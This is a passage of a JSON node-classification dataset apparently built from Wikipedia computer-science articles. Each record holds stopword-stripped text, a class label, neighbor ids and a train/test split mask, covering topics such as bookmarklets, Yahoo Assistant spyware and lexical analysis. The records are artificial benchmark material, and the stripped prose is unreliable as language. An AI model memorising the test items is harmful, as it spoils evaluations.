nubus-based expansion card first version system ready use february 1988 1988 apple released first unix-based os a/ux unix operating system mac os look feel competitive time due part crowded unix market macintosh hardware lacking high-end design features present workstation-class computers a/ux success sales u.s. government posix compliance requirement mac os could meet macintosh application environment mae software package introduced apple 1994 allowed users certain unix-based computer workstations run apple macintosh application software mae used x window system emulate macintosh finder-style graphical user interface last version mae 3.0 compatible system 7.5.3 mae available sun microsystems sparcstation hewlett-packard systems discontinued may 14 1998 announced 1996 worldwide developers conference wwdc mklinux open source operating system started osf research institute apple february 1996 port linux powerpc platform thus macintosh computers mid 1998 community-led mklinux developers association took development operating system mklinux short microkernel linux refers project adaptation linux kernel run server hosted atop mach microkernel mklinux based version 3.0 mach star trek boldly go mac gone relatively unknown secret prototype beginning 1992 whose goal create version classic mac os would run intel-compatible x86 personal computers partnership apple support intel project instigated novell looking integrate dr-dos mac os gui mutual response monopoly microsoft windows 3.0 ms-dos team consisting four apple four novell able get macintosh finder basic applications quicktime running smoothly x86 architecture project canceled year later early 1993 code later reused porting mac os powerpc taligent portmanteau talent intelligent name object-oriented operating system company dedicated producing started project within apple provide replacement classic mac os later spun joint venture ibm part aim alliance purpose building competing platform microsoft cairo nextstep development process never worked taligent often cited example project death march apple pulled project 1995 code delivered copland project apple create updated version classic mac os introduced protected memory preemptive multitasking number new underlying operating system features yet still compatible existing mac software originally planned follow-up release known gershwin would add multithreading advanced features new features added rapidly could completed completion date slipped future sign release 1996 apple decided cancel project outright find suitable third-party system replace copland development ended august 1996 december 1996 apple announced buying next nextstep operating system arrival macintosh 1984 apple history operating systems began apple ii series computers 1977 ran apple dos prodos later gs/os apple iii 1980 ran apple sos apple lisa 1983 ran lisa os later macworks xl macintosh emulator apple also developed newton os newton personal digital assistant 1993 1997 recent years apple also launched several new operating systems based core macos including ios 2007 iphone ipad ipod touch mobile devices watchos 2015 apple watch tvos 2015 apple tv set-top box audioos homepod smart speakers",
    "neighbors": [
      6155,
      4111,
      4114,
      25,
      6180,
      6186,
      6221,
      4184,
      2141,
      10333,
      97,
      2149,
      8298,
      8303,
      8304,
      2168,
      6264,
      2179,
      10382,
      6296,
      2201,
      4251,
      2207,
      10406,
      171,
      178,
      2232,
      6329,
      8388,
      2248,
      213,
      8410,
      4318,
      231,
      6377,
      2282,
      10478,
      2288,
      242,
      8441,
      10499,
      10512,
      273,
      292,
      2345,
      2355,
      4409,
      2363,
      6459,
      2365,
      2366,
      4423,
      8540,
      10590,
      6495,
      8551,
      4457,
      10602,
      8557,
      10608,
      376,
      8573,
      2432,
      394,
      6539,
      4492,
      2462,
      421,
      4521,
      4525,
      8627,
      10676,
      460,
      4571,
      2534,
      487,
      10730,
      10731,
      8687,
      499,
      8700,
      6654,
      2560,
      10755,
      4615,
      6675,
      10776,
      4637,
      4643,
      6700,
      8754,
      10803,
      10809,
      8767,
      576,
      2625,
      8774,
      2632,
      4702,
      6760,
      10856,
      6771,
      2676,
      4727,
      2681,
      634,
      2686,
      10883,
      10888,
      10891,
      6797,
      8852,
      8877,
      8879,
      6837,
      8889,
      6849,
      713,
      731,
      4844,
      2811,
      2819,
      8975,
      8977,
      787,
      789,
      4888,
      11037,
      811,
      823,
      9022,
      11075,
      4933,
      838,
      9035,
      6988,
      9063,
      7020,
      2933,
      7039,
      11144,
      9100,
      7057,
      9109,
      5022,
      9123,
      11171,
      935,
      11184,
      9151,
      11204,
      11205,
      7118,
      9166,
      3035,
      7133,
      5093,
      1007,
      5105,
      7154,
      11251,
      11257,
      7163,
      5115,
      1042,
      7187,
      5158,
      7217,
      1074,
      3160,
      9308,
      3167,
      11363,
      9328,
      7285,
      9335,
      1147,
      7292,
      3197,
      1150,
      5247,
      11390,
      11402,
      7307,
      7318,
      9366,
      9370,
      3228,
      7325,
      11430,
      3241,
      5292,
      3248,
      9406,
      9418,
      7378,
      3286,
      7382,
      9430,
      9436,
      1247,
      11489,
      1253,
      7403,
      9451,
      5363,
      11513,
      9466,
      3323,
      3324,
      9468,
      1278,
      7422,
      11521,
      1282,
      5384,
      9487,
      11539,
      5397,
      3371,
      7477,
      7483,
      1346,
      5452,
      5457,
      11601,
      7507,
      7511,
      3426,
      7523,
      5484,
      11635,
      5492,
      7561,
      5520,
      11667,
      11675,
      1439,
      1445,
      9643,
      7601,
      9665,
      3522,
      9686,
      9700,
      9732,
      1542,
      1549,
      3598,
      5647,
      9762,
      9778,
      1592,
      9784,
      5694,
      5696,
      5713,
      3670,
      1623,
      3681,
      3691,
      9835,
      7806,
      3719,
      5784,
      9882,
      9887,
      7849,
      1710,
      9907,
      3766,
      9912,
      5823,
      1736,
      9932,
      3790,
      5840,
      9955,
      7928,
      1796,
      1804,
      9999,
      10016,
      7983,
      7986,
      10036,
      7991,
      7999,
      10052,
      3948,
      1904,
      8063,
      10113,
      8069,
      6023,
      3978,
      8092,
      6048,
      8114,
      6075,
      6078,
      4040,
      8136,
      4068,
      8170,
      10221,
      6128,
      10235,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 5620,
    "label": 2,
    "text": "Open_Automotive_Alliance:open automotive alliance open automotive alliance oaa alliance automotive manufacturers technology companies aimed using android automobiles announced ces january 6 2014 members open automotive alliance",
    "neighbors": [
      3082,
      8719,
      5139,
      7700,
      9244,
      10780,
      11294,
      10785,
      3618,
      6180,
      1578,
      5677,
      8242,
      9266,
      1083,
      10817,
      6212,
      69,
      6213,
      8262,
      6216,
      8268,
      4685,
      3664,
      8280,
      8285,
      2658,
      5222,
      10856,
      4734,
      11391,
      7812,
      1670,
      8326,
      4238,
      5262,
      10382,
      2195,
      2711,
      10393,
      9882,
      7835,
      1694,
      673,
      2723,
      8870,
      1191,
      10933,
      5815,
      5822,
      196,
      1736,
      2762,
      8907,
      8909,
      8410,
      10971,
      8413,
      9949,
      8928,
      1761,
      2278,
      1255,
      233,
      4841,
      8940,
      10482,
      2294,
      8439,
      2809,
      7938,
      5892,
      7428,
      4360,
      1813,
      792,
      280,
      10009,
      10525,
      798,
      288,
      10016,
      2852,
      8486,
      295,
      10537,
      3380,
      823,
      5431,
      6968,
      7992,
      2875,
      3900,
      10045,
      318,
      3911,
      11082,
      332,
      6988,
      10063,
      3409,
      8019,
      2901,
      5975,
      5467,
      3940,
      10091,
      7540,
      7548,
      8573,
      1406,
      8066,
      4995,
      900,
      5514,
      9610,
      4493,
      10129,
      5522,
      1427,
      11155,
      9621,
      10645,
      8602,
      11678,
      2978,
      1444,
      1445,
      9637,
      935,
      1959,
      937,
      4521,
      4011,
      5546,
      7595,
      9646,
      9660,
      457,
      5067,
      2001,
      8147,
      479,
      2529,
      6625,
      8676,
      2021,
      1513,
      1516,
      5100,
      3055,
      5105,
      2036,
      11252,
      8186,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5621,
    "label": 4,
    "text": "SaferNet:safernet safernet brazilian non-governmental organization combats internet crime partnership federal public ministry facilitates anonymous reporting provides information training internet safety security safernet facilitates anonymous reporting crimes extra consideration preventing investigating child pornography identity theft various hate crimes also works government improve legislation internet-related crimes safernet also educates trains mobilizes public issues relating rights safety 2006 safernet federal public ministry brought suit google brazilian business unit alleging google policing orkut pages enough prevent pornography hate crimes complying judge ruling google provided requested user information brazilian authorities",
    "neighbors": [
      4163,
      7044,
      4453,
      8202,
      1899,
      4945,
      7327
    ],
    "mask": "Test"
  },
  {
    "node_id": 5622,
    "label": 9,
    "text": "Bookmarklet:bookmarklet bookmarklet bookmark stored web browser contains javascript commands add new features browser bookmarklets unobtrusive javascripts stored url bookmark web browser hyperlink web page bookmarklets usually javascript programs regardless whether bookmarklet utilities stored bookmarks hyperlinks add one-click functions browser web page clicked bookmarklet performs one wide variety operations running search query extracting data table example clicking bookmarklet selecting text webpage could run internet search selected text display search engine results page another name bookmarklet favelet favlet derived favorite steve kangas bookmarklets.com coined word bookmarklet started create short scripts based suggestion netscape javascript guide tantek çelik called scripts favelets used word early 6 september 2001 personal email brendan eich developed javascript netscape gave account origin bookmarklets increased implementation content security policy csp websites caused problems bookmarklet execution usage 2013-2015 suggesting hails end death bookmarklets william donnelly created work-around solution problem specific instance loading referencing using javascript library code early 2015 using greasemonkey userscript firefox pale moon browser add-on extension simple bookmarklet-userscript communication protocol allows library-based bookmarklets executed websites including using csp https // uri scheme note however if/when browsers support disabling/disallowing inline script execution using csp if/when websites begin implement feature break fix web browsers use uris codice_1 attribute tag bookmarks uri scheme codice_2 codice_3 codice_4 specifies protocol format rest string browsers also implement prefix codice_5 parser like uri internally browser sees specified protocol javascript treats rest string javascript application executed uses resulting string new page executing script access current page may inspect change script returns undefined type rather example string browser load new page result script simply runs current page content permits changes in-place font size color changes without page reload anonymous function return value define function etc. used force script return undefined type javascript function however script includes function definition/redefinition function use_this_globally ... environment populated reason arbitrary script suffixed void ... javascript arbitrary script void 0 bookmarklets saved used normal bookmarks simple one-click tools add functionality browser example installation bookmarklet performed creating new bookmark pasting code url destination field alternatively bookmarklet presented link browsers dragged dropped onto bookmark bar bookmarklet run loading bookmark normally microsoft edge possible add bookmarklet favourites instead right-click link choose 'add reading list bookmarklet run clicking reading list microsoft edge reading list favourites opened using icon pile lines example bookmarklet performs wikipedia search highlighted text web browser window normal use following javascript code would installed bookmark browser bookmarks toolbar selecting text clicking bookmarklet performs search javascript function function se se document i=0 frames.length i++ se frames .document || s== prompt 'enter 20search 20terms 20for 20wikipedia open 'https //en.wikipedia.org '/w/index.php title=special search search= encodeuricomponent .focus bookmarklets modify location e.g save web page wayback machine javascript location.href='https //web.archive.org/save/'+document.location.href open new web browser window tab e.g show source web resource web browser supports view-source uri scheme javascript void window.open 'view-source '+location show info related current url e.g. javascript alert '\\tdocument.url\\n'+document.url+'\\n\\tdocument.lastmodified\\n'+document.lastmodified+'\\n\\tlocation\\n'+location among things",
    "neighbors": [
      1664,
      2945,
      6528,
      3971,
      6657,
      7044,
      3462,
      6791,
      7943,
      8584,
      6028,
      8588,
      2579,
      7572,
      7708,
      7965,
      10910,
      8351,
      5026,
      803,
      1834,
      9770,
      7340,
      559,
      9728,
      9908,
      4661,
      3639,
      11449,
      1723,
      4797,
      64,
      10057,
      11466,
      5707,
      7885,
      4048,
      5968,
      10834,
      4310,
      5078,
      6231,
      9561,
      6747,
      8923,
      737,
      5605,
      4326,
      487,
      6886,
      8169,
      1642,
      9834,
      8557,
      494,
      1520,
      7152,
      115,
      9843,
      5622,
      4728,
      5114,
      8443
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5623,
    "label": 9,
    "text": "Hope_(programming_language):hope programming language hope small functional programming language developed 1970s university edinburgh predates miranda haskell contemporaneous ml also developed university hope derived npl simple functional language developed rod burstall john darlington work program transformation npl hope notable first languages call-by-pattern evaluation algebraic data types hope named sir thomas hope c. 1681–1771 scottish agricultural reformer hope park square edinburgh location department artificial intelligence time development hope also named factorial program hope changing order clauses change meaning program hope pattern matching always favors specific patterns less specific ones explicit type declarations hope required option use type-inference algorithm hope hope provides two built-in data structures tuples lists first implementation hope strict since one lazy versions strict versions lazy constructors british telecom embarked project imperial college implement strict version first release coded thanos vassilakis 1986 releases coded mark tasng british telecom roger bailey hope tutorial august 1985 issue byte references interpreter ibm pc dos 2.0",
    "neighbors": [
      11258,
      6148,
      3876,
      8262,
      6536,
      1333,
      7386
    ],
    "mask": "None"
  },
  {
    "node_id": 5624,
    "label": 4,
    "text": "Identity_driven_networking:identity driven networking identity driven networking idn process applying network controls network device access based identity individual group individuals responsible operating device individuals identified network tuned respond presence context osi model provides method deliver network traffic system application requested listening data applications operate either system based user-daemon process may user application web browser internet security built around idea ability request respond requests subjected degree authentication validation authorization policy enforcement identity driven networking endeavors resolve user system based policy single management paradigm since internet comprises vast range devices applications also many boundaries therefore ideas resolve connectivity users within boundaries endeavor overlay system identity framework must first decide identity determine use existing controls decide intended new information digital identity represents connectedness real projection identity may incorporate references devices well resources policies systems policies provide entitlements identity claim particular point time space example person may entitled privileges work workplace may denied home hours user gets network usually form machine authentication probably verifies configures system basic level access short mapping user mac address prior process 802.1x simple users authenticate point usual user attempt authenticate system processes daemons started may well require network configuration already performed follows principle network identity device established permitting network connectivity example using digital certificates place hardware addresses trivial spoof device identifiers furthermore consistent identity model account typical network devices routers switches ca n't depend user identity since distinctive user associated device absent capability practice however strong identity asserted network level first task seeking apply identity driven network controls comprises form authentication device level stack since first piece infrastructure placed upon network often network operating system nos often identity authority controls resources nos contains usually printers file shares also procedures authenticate users onto incorporating form single sign-on means flow effect controls seamless many network capabilities made rely upon authentication technologies provisioning access control policy instance packet filtering -firewall content-control software quota management systems quality service qos systems good examples controls made dependent upon authentication",
    "neighbors": [
      3521,
      3941,
      5573,
      7368,
      1961,
      10058,
      210,
      7411,
      6651,
      5433,
      3643,
      3007
    ],
    "mask": "Test"
  },
  {
    "node_id": 5625,
    "label": 4,
    "text": "Anderson's_rule_(computer_science):anderson rule computer science field computer security anderson rule refers principle formulated ross j. anderson nature large databases never free abuse breaches security large system designed ease access becomes insecure made watertight becomes impossible use",
    "neighbors": [
      2901,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5626,
    "label": 2,
    "text": "Free_list:free list free list data structure used scheme dynamic memory allocation operates connecting unallocated regions memory together linked list using first word unallocated region pointer next suitable allocating memory pool objects size free lists make allocation deallocation operations simple free region one would link free list allocate region one would simply remove single region end free list use regions variable-sized one may search region large enough size expensive free lists disadvantage inherited linked lists poor locality reference poor data cache utilization automatically consolidate adjacent regions fulfill allocation requests large regions unlike buddy allocation system nevertheless 're still useful variety simple applications full-blown memory allocator unnecessary requires much overhead",
    "neighbors": [
      4668,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 5627,
    "label": 7,
    "text": "ProSyst:prosyst prosyst software gmbh founded cologne 1997 company specializing java software middleware prosyst first commercial application java ee application server 2000 company sold server technology since focused completely osgi solutions 1999 prosyst among first companies join osgi alliance since made important contributions development release osgi specifications release 1–4 prosyst member osgi alliance board directors alongside ibm nokia ntt siemens oracle corporation samsung motorola telcordia additionally members prosyst staff serve several positions osgi alliance recent years prosyst set focus exclusively development osgi related software frameworks bundles remote management systems osgi tools developers including full sdk available download prosyst ’ osgi applications used smarthome devices mobile phone manufacturers network equipment providers cpes white goods manufacturers car manufacturers ehealth market prosyst employs 120 java osgi experts offers osgi related training support slas technical consulting development services member prosyst contributes osgi eclipse java community process nokia forum pro cvta connected vehicle trade association prosyst acquired bosch february 2015 merged bosch group software systems unit bosch software innovations gmbh",
    "neighbors": [
      4960,
      8122,
      3323,
      5677
    ],
    "mask": "None"
  },
  {
    "node_id": 5628,
    "label": 3,
    "text": "War_in_Middle_Earth:war middle earth war middle earth real-time strategy game released zx spectrum msx commodore 64 amstrad cpc ms-dos commodore amiga apple iigs atari st 1988 australian company melbourne house game combined large scale army unit level small scale character level action happened simultaneously game world places could seen map ground level individual characters could also seen larger battles either survived died — gandalf alone could easily defeat hundred orcs battle quite small less 100 units approximately watched ground level otherwise displayed numerically ground level characters could acquire objects talk computer-controlled friendly characters radagast tom bombadil game reviewed 1989 dragon 147 hartley patricia kirk lesser role computers column reviewers gave game 3 5 stars computer gaming world gave game mixed review noting although faithfully recreates events books genuine strategy lacking game plays similarly subsequent playthroughs compute review positive criticizing anticlimactic ending otherwise impressive game faithful middle earth story line spanish magazine microhobby valued game following scores originality 80 graphics 70 motion sound 50 difficulty 100 addiction 80",
    "neighbors": [
      6976,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5629,
    "label": 3,
    "text": "Sega_TeraDrive:sega teradrive ibm pc compatible system integrated mega drive developed sega manufactured ibm 1991 teradrive allowed mega drive games played time pc section used possible mega drive pc hardware interact system released japan sega hoped integrating popular mega drive console ibm pc would attract potential customers wishing purchase pc system proved unpopular failed one main processors used system intel 80286 released 1982 however time teradrive released 1991 processor almost 10 years date powerful 25 mhz intel 80486 released 1989 making teradrive central processor 2 generations behind time system also contains motorola 68000 zilog z80 processors used mega drive ran 7.67 mhz 3.58 mhz respectively machine front panel ports included two mega drive pad ports similar design 9-pin male serial ports 2 ps/2 ports right side unit accommodate mouse keyboard system also contained several ports rear order left right 9-pin male serial port 25-pin parallel port connection printer stereo rca jacks composite ntsc video output connection tv analogue rgb monitor connection 2nd 9-pin male serial connector labelled ext similar found rear original mega drive base unit motherboard also spare isa slot available expansion hole rear unit accommodate interface consisted start-up menu several options including file manager dos clock mega drive mode machine included ibm drivers bundled floppy disk enabled properly written software operate machine ram run native mega drive hardware good example shown puzzle construction program one software titles included teradrive included pc-side editor suite changing features falling-block puzzle game playable mega drive side operating system shipped system ibm dos j4.0/v similar pc dos often speculation teradrive specifically designed purpose-made software development kit allow software makers develop software titles mega drive however given release date teradrive years initial mega drive release well availability sega game development hardware unlikely teradrive designed purpose system peripherals included available separately included 2 × mega drive pads 1 × ps/2 mouse 1 × sega branded ps/2 ibm keyboard 1 × 3-button joystick mouse mega drive pads practically identical found mega drive console version monitor manufactured 3rd party company sega branding available separately price ¥79,800 estimated usd 600/gbp £300 time capable displaying 15 khz rgb video signals mega drive hardware 31 khz vga output pc hardware vga connector three models available ranging ¥148,000 usd 1100/gbp £580 ¥248,000 usd 1840/gbp £950 system proved unpopular japanese market ultimately failed production numbers unknown system moderately rare japan although prices rising rapidly due collector demand price buy teradrive june 2003 triple price 2 years prior new pc also discussion stages developed sega leadership ex-ibm executive narutomi likely never got past discussion stages due failure teradrive similar unrelated system manufactured amstrad sold name mega pc pal areas europe australia although boasted higher specification sega teradrive unable act software development kit due inability interact pc mega drive together essentially pc mega drive bundled inside",
    "neighbors": [
      6148,
      7269,
      1801,
      780,
      7151,
      1776,
      6129,
      7983,
      5368,
      3323,
      11452,
      1501
    ],
    "mask": "None"
  },
  {
    "node_id": 5630,
    "label": 9,
    "text": "Linkage_(software):linkage software programming languages particularly compiled ones like c c++ linkage describes names refer entity throughout whole program one single translation unit codice_1 keyword used c restrict visibility function variable translation unit also valid c++ c++ 98/03 deprecated usage favor anonymous namespaces longer deprecated c++ 11 also c++ implicitly treats codice_2 namespace-scope variable internal linkage unless explicitly declared codice_3 unlike c. name linkage related distinct scope scope name part translation unit visible instance name global scope file-scope c global namespace-scope c++ visible part file scope end end translation unit whether name given external internal linkage name external linkage entity name denotes may referred another translation unit using distinct declaration name scopes within translation unit using distinct declarations name given internal linkage declaration would denote distinct entity although using name entity could referred distinct declarations within translation unit name linkage referred declarations different scopes even within translation unit examples names parameters functions local variables details differ c objects functions types linkage c++ simplified overview linkage languages must done care different languages adorn external symbols differently common idiom uses codice_4 link c++ c code definition 'linkage quoted iso/iec 9899 tc3 c99 standard c uses term identifier article uses name latter c++ uses formalize linkage identifier declared different scopes scope made refer object function process called linkage following common example linkage function codice_5 declared two files function body defined demo2.c via linkage codice_5 called codice_7 inside demo1.c refers codice_5 demo2.c example external linkage function",
    "neighbors": [
      9921,
      6664,
      8874,
      5165,
      10510,
      6640,
      1724,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5631,
    "label": 4,
    "text": "Yahoo!_Assistant:yahoo assistant yahoo assistant formerly named 3721 internet assistant browser helper object internet explorer developed beijing 3721 technology co. ltd renamed yahoo assistant beijing 3721 technology acquired yahoo 3721 internet assistant together 3721 chinese keywords known spyware microsoft antispyware malware browser hijacker others panda antivirus however yahoo china filed lawsuit beijing sanjiwuxian internet technology co. ltd developer 360safe antispyware identifying yahoo assistant malware 360safe 3721 internet assistant originally released normal client-server application however turned use activex technology install client system later also shipped many sharewares default install options 3721 internet assistant also blamed use flaw microsoft internet explorer install automatically user browsing array 3721 sponsored personal commercial websites microsoft internet explorer yahoo assistant also included 3721 chinese keywords yahoo mail express sometimes whole package internet assistant chinese keywords mail express named yahoo assistant sharewares company says automatic installation ended september 2005 asks user permission installing however ca inc. reported yahoo assistant installation extra components installed without obtaining user consent software also bundled chinese client cga gaming platform 3721 claims 3721 internet assistant includes many useful features ie setting repair security shield removal internet history information blocking ads however installs various windows hooks slow system tries install hooks repeatedly users also reported internet assistant buttons reappeared immediately manual removal using internet explorer customization features blue screen death appeared using internet assistant test using http //www.kephyr.com/popupkillertest shows 3721 internet assistant block roughly half popup methods built-in popup blocker windows xp sp2 turned 3721 internet assistant enable/disable internet explorer extensions except advertisement links extensions installed yahoo products 3721 internet assistant runs multiple rundll32.exe processes one killed windows task manager immediately restarted others thereby resisting efforts user terminate application driver named cnsminkp.sys installed 3721 internet assistant along several hidden windows services uninstallation several files left system visible windows explorer found using tools total commander dos box yahoo assistant also removes 360safe antispyware program competitor without notifying user august 15 2007 beijing court ruled behavior unfair competition 3721 internet assistant together 3721 chinese keywords according interfax regarded chinese internet users hooligan zombie applications uninstall program pair provided 3721 simply redirects users 3721 website simplified chinese thus recognizable except chinese speakers default option web page keep 3721 internet assistant uninstallation following web uninstallation wizard reboot many 3721 files still remain client system pair ranked 1 beijing association online media list chinese malware 2005",
    "neighbors": [
      488,
      10026,
      5935,
      10392,
      7515,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 5632,
    "label": 1,
    "text": "Triplestore:triplestore triplestore rdf store purpose-built database storage retrieval triples semantic queries triple data entity composed subject-predicate-object like bob 35 bob knows fred much like relational database one stores information triplestore retrieves via query language unlike relational database triplestore optimized storage retrieval triples addition queries triples usually imported/exported using resource description framework rdf formats triplestores built database engines scratch others built top existing commercial relational database engines sql-based nosql document-oriented database engines like early development online analytical processing olap databases intermediate approach allowed large powerful database engines constructed little programming effort initial phases triplestore development seems likely native triplestores advantage performance longer period time difficulty implementing triplestores sql although triples may thus stored implementing efficient querying graph-based rdf model mapping sparql onto sql queries difficult adding name triple makes quad store named graph graph database generalized structure triplestore using graph structures nodes edges properties represent store data graph databases might provide index-free adjacency meaning every element contains direct pointer adjacent elements index lookups necessary general graph databases store graph distinct specialized graph databases triplestores network databases",
    "neighbors": [
      2688,
      8451,
      8201,
      6161,
      9631,
      1697,
      9893,
      9397,
      4155,
      7868,
      9147,
      9150,
      11324,
      2369,
      11457,
      6085,
      6470,
      9286,
      2512,
      2901,
      7767,
      11098,
      987,
      7650,
      3171,
      8291,
      6629,
      9828,
      10471,
      1146,
      6395,
      3196,
      3454
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5633,
    "label": 9,
    "text": "Formula_language:formula language formula language scripting language used lotus notes often referred formula language pronounced at-formula many language elements start -character example selection formula created ray ozzie early development lotus notes borrowed compiler decompiler lotus 1-2-3 spreadsheet unlike spreadsheet language formula language designed primarily string list processing numerical processing originally functional programming language unique text list-handling features inspired ray ozzie prior use icon lisp formula language engine rewritten damien katz notes domino 6 new features added language looping dynamic execution performance improved formula language two parts functions used several places throughout lotus notes important uses commands like menu commands perform actions lotus notes client examples actions commands primarily used formulas triggered user action button formulas possible combine functions example making execution command conditional field value",
    "neighbors": [
      3481,
      9780,
      6502
    ],
    "mask": "Test"
  },
  {
    "node_id": 5634,
    "label": 9,
    "text": "Ousterhout's_dichotomy:ousterhout dichotomy ousterhout dichotomy computer scientist john ousterhout categorization high-level programming languages tend fall two groups distinct properties uses system programming languages scripting languages – compare programming large programming small distinction underlies design language tcl system programming languages applications languages usually following properties system programming languages tend used components applications large amounts internal functionality operating systems database servers web browsers applications typically employ complex algorithms data structures require high performance prototypical examples system programming languages include c modula-2 contrast scripting languages glue languages tend following properties scripting languages tend used applications functionality comes programs often implemented system programming languages scripts used glue together programs add additional layers functionality top existing programs ousterhout claims scripts tend short often written less sophisticated programmers execution efficiency less important simplicity ease interaction programs common applications scripting include web page generation report generation graphical user interfaces system administration prototypical examples scripting languages include applescript c shell dos batch files tcl dichotomy fully set though ousterhout drawn distinction since least design tcl 1988 stated publicly various times early episode tcl war late september october 1994 richard stallman posted article critical tcl entitled use tcl ousterhout replied articulation dichotomy many believe dichotomy highly arbitrary refer ousterhout fallacy ousterhout false dichotomy strong-versus-weak typing data structure complexity independent versus stand-alone might said unrelated features usual critique ousterhout dichotomy distinction compiling versus interpreting since neither semantics syntax depend significantly whether code compiled machine-language interpreted tokenized byte-compiled start run mix many languages fall interpreted compiled e.g lisp forth ucsd pascal perl java makes compiling versus interpreting dubious parameter taxonomy programming languages",
    "neighbors": [
      3904,
      3267,
      4998,
      6502,
      8582,
      5677,
      2481,
      9330,
      9714,
      692,
      9780,
      3350,
      11411,
      7421,
      2045,
      6558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5635,
    "label": 9,
    "text": "Lexical_analysis:lexical analysis computer science lexical analysis lexing tokenization process converting sequence characters computer program web page sequence tokens strings assigned thus identified meaning program performs lexical analysis may termed lexer tokenizer scanner though scanner also term first stage lexer lexer generally combined parser together analyze syntax programming languages web pages forth lexer forms first phase compiler frontend modern processing analysis generally occurs one pass older languages algol initial stage instead line reconstruction performed unstropping removed whitespace comments scannerless parsers separate lexer steps done part lexer lexers parsers often used compilers used computer language tools prettyprinters linters lexing divided two stages scanning segments input string syntactic units called lexemes categorizes token classes evaluating converts lexemes processed values lexers generally quite simple complexity deferred parser semantic analysis phases often generated lexer generator notably lex derivatives however lexers sometimes include complexity phrase structure processing make input easier simplify parser may written partly fully hand either support features performance lexeme sequence characters source program matches pattern token identified lexical analyzer instance token authors term token using token interchangeably represent string tokenized token data structure resulting putting string tokenization process word lexeme computer science defined differently lexeme linguistics lexeme computer science roughly corresponds word linguistics confused word computer architecture although cases may similar morpheme lexical token simply token string assigned thus identified meaning structured pair consisting token name optional token value token name category lexical unit common token names consider expression c programming language lexical analysis expression yields following sequence tokens token name might termed part speech linguistics specification programming language often includes set rules lexical grammar defines lexical syntax lexical syntax usually regular language grammar rules consisting regular expressions define set possible character sequences lexemes token lexer recognizes strings kind string found lexical program takes action simply producing token two important common lexical categories white space comments also defined grammar processed lexer may discarded producing tokens considered non-significant separating two tokens codice_2 instead codice_3 two important exceptions first off-side rule languages delimit blocks indenting initial whitespace significant determines block structure generally handled lexer level see phrase structure secondly uses lexers comments whitespace must preserved – examples prettyprinter also needs output comments debugging tools may provide messages programmer showing original source code 1960s notably algol whitespace comments eliminated part line reconstruction phase initial phase compiler frontend separate phase eliminated handled lexer tokenization process demarcating possibly classifying sections string input characters resulting tokens passed form processing process considered sub-task parsing input example text string string n't implicitly segmented spaces natural language speaker would raw input 43 characters must explicitly split 9 tokens given space delimiter i.e. matching string codice_5 regular expression codice_6 tokens could represented xml sentence /sentence s-expression token class represents one possible lexeme lexer often saves enough information reproduce original lexeme used semantic analysis parser typically retrieves information lexer stores abstract syntax tree necessary order avoid information loss case numbers identifiers tokens identified based specific rules lexer methods used identify tokens include regular expressions specific sequences characters termed flag specific separating characters called delimiters explicit definition dictionary special characters including punctuation characters commonly used lexers identify tokens natural use written programming languages tokens often categorized character content context within data stream categories defined rules lexer categories often involve grammar elements language used data stream programming languages often categorize tokens identifiers operators grouping symbols data type written languages commonly categorize tokens nouns verbs adjectives punctuation categories used post-processing tokens either parser functions program lexical analyzer generally nothing combinations tokens task left parser example typical lexical analyzer recognizes parentheses tokens nothing ensure matched lexer feeds tokens parser representation used typically enumerated list number representations example identifier represented 0 assignment operator 1 addition operator 2 etc tokens defined often regular expressions understood lexical analyzer generator lex lexical analyzer generated automatically tool like lex hand-crafted reads stream characters identifies lexemes stream categorizes tokens termed tokenizing lexer finds invalid token report error following tokenizing parsing interpreted data may loaded data structures general use interpretation compiling first stage scanner usually based finite-state machine fsm encoded within information possible sequences characters contained within tokens handles individual instances character sequences termed lexemes example integer lexeme may contain sequence numerical digit characters many cases first non-whitespace character used deduce kind token follows subsequent input characters processed one time reaching character set characters acceptable token termed maximal munch longest match rule languages lexeme creation rules complex may involve backtracking previously read characters example c one l character enough distinguish identifier begins l wide-character string literal lexeme however string characters known certain kind e.g. string literal sequence letters order construct token lexical analyzer needs second stage evaluator goes characters lexeme produce value lexeme type combined value properly constitutes token given parser tokens parentheses really values evaluator function return nothing type needed similarly sometimes evaluators suppress lexeme entirely concealing parser useful whitespace comments evaluators identifiers usually simple literally representing identifier may include unstropping evaluators integer literals may pass string deferring evaluation semantic analysis phase may perform evaluation involved different bases floating point numbers simple quoted string literal evaluator needs remove quotes evaluator escaped string literal incorporates lexer unescapes escape sequences example source code computer program string might converted following lexical token stream whitespace suppressed special characters value due licensing restrictions existing parsers may necessary write lexer hand practical list tokens small general lexers generated automated tools tools generally accept regular expressions describe tokens allowed input stream regular expression associated production rule lexical grammar programming language evaluates lexemes matching regular expression tools may generate source code compiled executed construct state transition table finite-state machine plugged template code compiling executing regular expressions compactly represent patterns characters lexemes might follow example english-based language identifier token might english alphabetic character underscore followed number instances ascii alphanumeric characters and/or underscores could represented compactly string means character a-z a-z followed 0 a-z a-z 0-9 regular expressions finite-state machines generate powerful enough handle recursive patterns n opening parentheses followed statement followed n closing parentheses unable keep count verify n sides unless finite set permissible values exists n takes full parser recognize patterns full generality parser push parentheses stack try pop see stack empty end see example structure interpretation computer programs book typically tokenization occurs word level however sometimes difficult define meant word often tokenizer relies simple heuristics example languages use inter-word spaces use latin alphabet programming languages approach fairly straightforward however even many edge cases contractions hyphenated words emoticons larger constructs uris purposes may count single tokens classic example new york-based naive tokenizer may break space even though better break arguably hyphen tokenization particularly difficult languages written scriptio continua exhibit word boundaries ancient greek chinese thai agglutinative languages korean also make tokenization tasks complicated ways address difficult problems include developing complex heuristics querying table common special-cases fitting tokens language model identifies collocations later processing step lexers often generated lexer generator analogous parser generators tools often come together established lex paired yacc parser generator free equivalents flex/bison generators form domain-specific language taking lexical specification – generally regular expressions markup – emitting lexer tools yield fast development important early development get working lexer language specification may change often often provide advanced features pre- post-conditions hard program hand however automatically generated lexer may lack flexibility thus may require manual modification all-manually written lexer lexer performance concern optimizing worthwhile stable languages lexer run often c html lex/flex-generated lexers reasonably fast improvements two three times possible using tuned generators hand-written lexers sometimes used modern 